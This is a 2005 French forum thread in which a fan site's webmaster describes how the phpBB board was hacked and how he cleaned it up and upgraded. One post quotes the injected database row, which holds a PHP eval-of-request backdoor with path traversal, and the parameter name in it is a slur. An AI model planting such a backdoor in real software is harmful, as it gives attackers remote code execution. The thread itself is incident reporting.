|
Voir le sujet précédent :: Voir le sujet suivant |
Auteur |
Message |
iGREKKESS Webmaster
Inscrit le: 04 Jan 2003 Messages: 7848 Localisation: Etampes
|
Posté le: Ven Mar 18, 2005 8:21 am Sujet du message: La board s'est faite hackée cette nuit... |
|
|
Je viens de me rendre compte de ça avant d'aller au boulot en me prenant un message d'erreur :
Code: | phpBB : Critical Error
Could not get theme data for themes_id [18] |
J'ai donc vu ce qui merdait et rétabli le bon ordre...
A première vue, il n'y a rien eu de modifié dans la base de données à l'execption de la table des templates, mais si vous voyez des trucs anormaux, signalez-les ici, je verrai ça en revenant (et j'expliquerai en même temps ce qu'ils ont fait)... _________________ Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー) |
|
Revenir en haut |
|
|
mariaud
Inscrit le: 25 Oct 2004 Messages: 1325
|
Posté le: Ven Mar 18, 2005 11:30 am Sujet du message: |
|
|
toujours aussi sécurisé phpbb :-/ |
|
Revenir en haut |
|
|
Madroms Administrateur
Inscrit le: 12 Déc 2004 Messages: 1869
|
Posté le: Ven Mar 18, 2005 12:11 pm Sujet du message: |
|
|
Ben, sans se connecter, il y a maintenant le fond blanc au lieu du fond bleu foncé étoilé.
C'est tou ce que j'ai remarqué. |
|
Revenir en haut |
|
|
Yeo Wren
Inscrit le: 25 Jan 2005 Messages: 632 Localisation: Ça dépend de l'heure.
|
Posté le: Ven Mar 18, 2005 12:36 pm Sujet du message: |
|
|
Oui, hors connection nous avons le droit au thème silver et dès qu'on se connecte on revient au SGB.
Est-ce que c'est forcément quelqu'un qui a fait ça ou est-ce que cela peut être l'oeuvre d'un ver ? _________________ Ytterbium Entity Optimized for Worldwide Repair and Efficient Nullification
Dernière édition par Yeo Wren le Ven Mar 18, 2005 7:11 pm; édité 2 fois |
|
Revenir en haut |
|
|
iGREKKESS Webmaster
Inscrit le: 04 Jan 2003 Messages: 7848 Localisation: Etampes
|
Posté le: Ven Mar 18, 2005 3:07 pm Sujet du message: |
|
|
Je pense en effet que cela peut être l'oeuvre d'un ver...
En fait il a réussi à accéder à la table définissant les templates installés (par une faille dans le code du côté admin), où il a supprimé les 2 entrées (pour subSilver et SpacePilot) et où il a recréé subSilver (qui n'avait du coup plus le même n° d'entrée dans la base) et un autre template intitulé FI Black avec des paramètres douteux, dont une commande dans le titre du template...
Cela donnait cela :
Code: | (2, 'aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp', 'FI Black', 'fiblack.css', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'row1', 'row2', '', '', '', '', 0, 0, 0, '', '006699', 'ffa34f', 'cc', 'bb', 'a', 0, 0); |
Comme SpacePilot (18ème entrée dans la base) n'existait plus, le forum ne pouvait plus le charger et indiquait le message d'erreur donné dans le topic.
J'ai donc recréé les entrées dans la table et viré le 2 autres créées par le hacker/ver. Et je suis quasiment certain que si j'avais sélectionné le template "FI Black" dans l'administration (ce template existe pour de vrai, mais je ne l'ai jamais installé), la commande aurait été exécutée et aurait fait quelque chose de pas génial
Enfin bref, je finis de remettre tout en état et je procède à une mise à jour de la board (il faut s'attendre à une coupure, le temps d'uploader, mettre à jour et sauvegarder la base...)
Edit :
Bon je suis fixé, c'est un "exploit" (qui permet d'injecter du code) pour les versions inférieures ou égales à la version 2.0.12 de phpBB (on était en 2.0.11 au moment où c'est arrivé), dont le code source complet en CPP est trouvable sans problème (sur un site de sécurité en plus ), donc ça a pu être exécuté par n'importe quel con qui voulait faire joujou...
Je comptais d'ailleur virer la version du forum qui apparaît en bas pour réduire la tentation des pirates...
Mariaud : c'est le même problème que pour Windows, ce n'est pas que phpBB a le plus de failles, c'est juste qu'il est le plus répandu, donc le plus sujet aux tentatives de hack... _________________ Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー) |
|
Revenir en haut |
|
|
Man-Jimaru Administrateur
Inscrit le: 11 Déc 2004 Messages: 1363 Localisation: Nice
|
Posté le: Ven Mar 18, 2005 3:38 pm Sujet du message: |
|
|
moi je dis triple ban pour notre YS national qui a trouvé tout ça _________________ Man-Jimaru
https://www.sega-legacy.fr |
|
Revenir en haut |
|
|
Bomber
Inscrit le: 12 Jan 2005 Messages: 159
|
Posté le: Ven Mar 18, 2005 5:25 pm Sujet du message: |
|
|
Ben il est le plus répandu, mais il a AUSSI plus de failles. |
|
Revenir en haut |
|
|
iGREKKESS Webmaster
Inscrit le: 04 Jan 2003 Messages: 7848 Localisation: Etampes
|
Posté le: Ven Mar 18, 2005 5:39 pm Sujet du message: |
|
|
Ne sois pas aussi affirmatif quand t'as aucun moyen de vérifier tes dires veux-tu
(pour savoir si phpBB a plus de failles, il faudrait faire un comparatif à niveau égal avec les autres boards...)
Bon sinon je viens de terminer l'update du forum en 2.0.13, suivi d'une sauvegarde de la DB. Ca tombe super bien, l'équipe de phpBB a justement retiré la version du forum en pied de page, donc rien de plus à faire... _________________ Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー) |
|
Revenir en haut |
|
|
haliway
Inscrit le: 17 Jan 2005 Messages: 46
|
Posté le: Dim Mar 20, 2005 10:25 pm Sujet du message: |
|
|
ah le php et ses super logiciels remplis de failles _________________ Le Dieu Saturn en personne |
|
Revenir en haut |
|
|
Seb
Inscrit le: 08 Juin 2004 Messages: 852
|
Posté le: Lun Avr 18, 2005 8:52 am Sujet du message: |
|
|
Citation: | Erreur Générale
Could not obtain common word list
DEBUG MODE
SQL Error : 1104 The SELECT would examine too many records and probably take a very long time. Check your WHERE and use SET OPTION SQL_BIG_SELECTS=1 if the SELECT is ok
SELECT word_id FROM phpbb_search_wordmatch GROUP BY word_id HAVING COUNT(word_id) > 4062
Line : 309
File : functions_search.php |
_________________
Attentifs, ensemble. |
|
Revenir en haut |
|
|
iGREKKESS Webmaster
Inscrit le: 04 Jan 2003 Messages: 7848 Localisation: Etampes
|
Posté le: Lun Avr 18, 2005 10:26 pm Sujet du message: |
|
|
Problème que j'avais signalé ICI et en fait c'est pas dû au forum mais à l'host qui limite certaines requêtes pour pas surcharger le serveur...
Pour éviter cette erreur, faut juste éviter de poster avec un unique URL comme contenu. _________________ Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー) |
|
Revenir en haut |
|
|
Seb
Inscrit le: 08 Juin 2004 Messages: 852
|
Posté le: Lun Avr 18, 2005 11:25 pm Sujet du message: |
|
|
autant pour moi meme _________________
Attentifs, ensemble. |
|
Revenir en haut |
|
|
|
|
Vous ne pouvez pas poster de nouveaux sujets dans ce forum Vous ne pouvez pas répondre aux sujets dans ce forum Vous ne pouvez pas éditer vos messages dans ce forum Vous ne pouvez pas supprimer vos messages dans ce forum Vous ne pouvez pas voter dans les sondages de ce forum
|
|